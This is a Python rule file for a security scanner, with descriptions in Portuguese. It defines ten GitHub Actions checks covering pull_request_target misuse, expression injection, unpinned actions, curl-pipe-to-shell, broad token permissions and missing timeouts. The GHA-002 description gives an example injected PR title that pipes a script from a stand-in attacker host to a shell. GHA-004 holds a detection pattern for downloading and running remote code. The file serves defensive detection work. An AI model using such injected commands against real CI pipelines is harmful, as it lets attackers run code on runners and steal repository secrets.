"""Regras de segurança para GitHub Actions — 10 regras (GHA-001..010)."""
import re
from analyzer.models import Severity, Confidence, Language, VulnCategory
from analyzer.rules.base import Rule

GHA_RULES: list[Rule] = [
    Rule(
        id="GHA-001",
        name="pull_request_target sem Restrição de Contexto — PWNED via Fork",
        description="O evento 'pull_request_target' executa no contexto do repositório base (não do fork), tendo acesso a secrets e permissões de write. Se o workflow faz checkout do código do PR e o executa (npm test, make build), um atacante com fork pode injetar código malicioso que roda com acesso a todos os secrets do repositório.",
        severity=Severity.CRITICAL,
        category=VulnCategory.COMMAND_INJECTION,
        language=Language.YAML,
        pattern=r'on\s*:\s*\n\s+pull_request_target',
        remediation="Não faça checkout do código do PR em workflows com pull_request_target. Se necessário, use duas etapas: (1) workflow sem acesso a secrets faz checkout e builda, (2) workflow separado usa o artefato. Ou use 'pull_request' em vez de 'pull_request_target' para código de fork.",
        cwe="CWE-78",
        owasp="A03:2021",
        confidence=Confidence.MEDIUM,
    ),
    Rule(
        id="GHA-002",
        name="Injeção de Código via Expressão GitHub Context",
        description="Usar '${{ github.event.pull_request.title }}', '${{ github.event.issue.body }}' ou outros valores de usuário diretamente em 'run:' permite script injection. Um PR com título '; curl attacker.com/shell.sh | sh' executa o comando injetado no runner.",
        severity=Severity.CRITICAL,
        category=VulnCategory.COMMAND_INJECTION,
        language=Language.YAML,
        pattern=r'run\s*:.*\$\{\{.*github\.event\.',
        remediation="Use variáveis de ambiente intermediárias: env: { PR_TITLE: '${{ github.event.pull_request.title }}' }, depois use $PR_TITLE em run:. GitHub escapa automaticamente os valores em env:, prevenindo script injection. Nunca interpole eventos diretamente em run:.",
        cwe="CWE-78",
        owasp="A03:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="GHA-003",
        name="Action de Terceiro sem SHA Fixo — Supply Chain",
        description="'uses: actions/checkout@v3' ou 'uses: user/action@main' referencia um branch ou tag que pode ser modificado pelo dono do repositório. Um atacante que compromete o repositório de terceiro pode alterar o código para exfiltrar secrets. Tags são mutáveis — podem ser movidas para um commit diferente.",
        severity=Severity.HIGH,
        category=VulnCategory.SECURITY_MISCONFIG,
        language=Language.YAML,
        pattern=r'uses\s*:\s*[a-zA-Z0-9_-]+/[a-zA-Z0-9_.-]+@(?![\da-f]{40})[^\s]+',
        remediation="Fixe actions a SHAs de commit imutáveis: 'uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29'. Adicione um comentário com a versão: '# v4.1.1'. Use ferramentas como 'pinact' ou 'dependabot' para manter SHAs atualizados. Audite actions de terceiros antes de usar.",
        cwe="CWE-494",
        owasp="A08:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="GHA-004",
        name="Download e Execução de Script Remoto — curl|bash",
        description="Comandos 'curl ... | bash', 'wget ... | sh' ou 'curl ... | python3' baixam e executam código não verificado da internet. O conteúdo do script pode mudar entre runs sem controle de versão. Ataque MITM ou comprometimento do servidor remoto resulta em execução de código malicioso no runner.",
        severity=Severity.CRITICAL,
        category=VulnCategory.COMMAND_INJECTION,
        language=Language.YAML,
        pattern=r'(?:curl|wget)\s+[^|]+\|\s*(?:bash|sh|zsh|python[23]?|perl|ruby)',
        remediation="Baixe o script, verifique o hash SHA256 e então execute: curl -o script.sh https://...; echo 'EXPECTED_HASH script.sh' | sha256sum --check; bash script.sh. Ou melhor, vendorize o script no repositório e execute da cópia local. Nunca pipe curl diretamente para sh.",
        cwe="CWE-494",
        owasp="A08:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="GHA-005",
        name="Runner Self-Hosted sem Label de Isolamento",
        description="'runs-on: self-hosted' sem labels específicos pode fazer o job rodar em qualquer runner self-hosted do repositório/organização. Runners self-hosted persistem entre jobs e podem reter estado (tokens, cached credentials). Um PR malicioso pode tentar explorar dados deixados por jobs anteriores.",
        severity=Severity.MEDIUM,
        category=VulnCategory.SECURITY_MISCONFIG,
        language=Language.YAML,
        pattern=r'runs-on\s*:\s*self-hosted\b(?!\s*\n\s*-)',
        remediation="Use labels específicos para isolar runners: runs-on: [self-hosted, linux, x64, production]. Configure runners efêmeros (--ephemeral flag) que são recriados a cada job. Para PRs de fork, use GitHub-hosted runners, não self-hosted. Habilite 'Require approval for all outside collaborators'.",
        cwe="CWE-284",
        owasp="A05:2021",
        confidence=Confidence.MEDIUM,
    ),
    Rule(
        id="GHA-006",
        name="Permissões GITHUB_TOKEN Excessivamente Amplas",
        description="'permissions: write-all' ou ausência de 'permissions:' (padrão read-all em algumas configs) dá ao workflow permissões excessivas. Um workflow comprometido pode criar releases, modificar code, gerenciar issues/PRs ou fazer deploy. O princípio de menor privilégio deve ser aplicado ao GITHUB_TOKEN.",
        severity=Severity.HIGH,
        category=VulnCategory.BROKEN_AUTH,
        language=Language.YAML,
        pattern=r'permissions\s*:\s*write-all',
        remediation="Declare permissões mínimas necessárias: permissions: { contents: read, pull-requests: write }. Configure 'permissions: {}' como default no topo do workflow e adicione permissões específicas em cada job. Habilite 'Restrict permissions for GITHUB_TOKEN' nas configurações do repositório.",
        cwe="CWE-269",
        owasp="A01:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="GHA-007",
        name="Secrets Expostos em Variáveis de Ambiente Visíveis",
        description="Definir secrets diretamente como variáveis de ambiente com nomes óbvios ('PASSWORD', 'API_KEY') os torna visíveis em logs quando 'set -x' ou ferramentas de debug estão habilitadas. GitHub mascara valores de secrets conhecidos, mas derivações ou transformações podem não ser mascaradas.",
        severity=Severity.HIGH,
        category=VulnCategory.SENSITIVE_DATA,
        language=Language.YAML,
        pattern=r'env\s*:\s*\n(?:\s+[^\n]+\n)*\s+(?:PASSWORD|SECRET|API_KEY|TOKEN|PRIVATE_KEY)\s*:\s*\$\{\{',
        remediation="Passe secrets diretamente para passos que precisam deles, não globalmente: steps: - run: deploy.sh; env: { API_KEY: '${{ secrets.API_KEY }}' }. Use GitHub Environment Secrets com aprovações obrigatórias para deploys em produção. Nunca imprima secrets com echo mesmo em debug.",
        cwe="CWE-312",
        owasp="A02:2021",
        confidence=Confidence.MEDIUM,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="GHA-008",
        name="actions/checkout sem persist-credentials: false",
        description="Por padrão, actions/checkout configura o git com credentials do GITHUB_TOKEN, que persiste no .git/config pelo tempo do job. Se o workflow executa código não confiável após o checkout (npm install, build scripts), esse código pode ler as credenciais git e exfiltrá-las.",
        severity=Severity.MEDIUM,
        category=VulnCategory.SENSITIVE_DATA,
        language=Language.YAML,
        pattern=r'uses\s*:\s*actions/checkout',
        negative_pattern=r'persist-credentials\s*:\s*false',
        remediation="Adicione 'persist-credentials: false' em todos os checkouts: uses: actions/checkout@SHA; with: { persist-credentials: false }. Se operações git subsequentes precisam de credenciais, use um token com escopos mínimos e configure-o explicitamente apenas para o passo necessário.",
        cwe="CWE-522",
        owasp="A02:2021",
        confidence=Confidence.LOW,
    ),
    Rule(
        id="GHA-009",
        name="continue-on-error: true em Steps de Segurança",
        description="'continue-on-error: true' faz o job continuar mesmo quando o step falha. Em steps de security scanning (SAST, dependências, secrets), uma falha é um sinal — continuar silencia vulnerabilidades. O pipeline aparece como verde enquanto falhas de segurança são ignoradas.",
        severity=Severity.MEDIUM,
        category=VulnCategory.SECURITY_MISCONFIG,
        language=Language.YAML,
        pattern=r'continue-on-error\s*:\s*true',
        remediation="Remova 'continue-on-error: true' de steps de segurança. Se você precisa que o pipeline continue mas quer visibilidade, use 'if: always()' em steps subsequentes para coletar resultados, mas deixe o job falhar. Para testes flaky, isole-os em jobs separados e use retry.",
        cwe="CWE-390",
        owasp="A05:2021",
        confidence=Confidence.MEDIUM,
    ),
    Rule(
        id="GHA-010",
        name="Workflow sem Timeout — DoS Potencial",
        description="Jobs sem 'timeout-minutes' podem rodar indefinidamente se travarem (loop infinito, dependência externa travada, deadlock). Isso consome minutos do GitHub Actions (custo) e pode bloquear o runner pool, causando DoS para outros workflows do repositório.",
        severity=Severity.LOW,
        category=VulnCategory.SECURITY_MISCONFIG,
        language=Language.YAML,
        pattern=r'jobs\s*:\s*\n\s+\w+\s*:\s*\n(?:\s+[^\n]+\n)*(?!\s+timeout-minutes)',
        remediation="Adicione timeout-minutes a todos os jobs: jobs: { build: { timeout-minutes: 30, runs-on: ubuntu-latest } }. Defina timeouts conservadores baseados no tempo médio de execução + buffer. Configure alertas para jobs que excedem o timeout esperado.",
        cwe="CWE-400",
        confidence=Confidence.LOW,
    ),
]
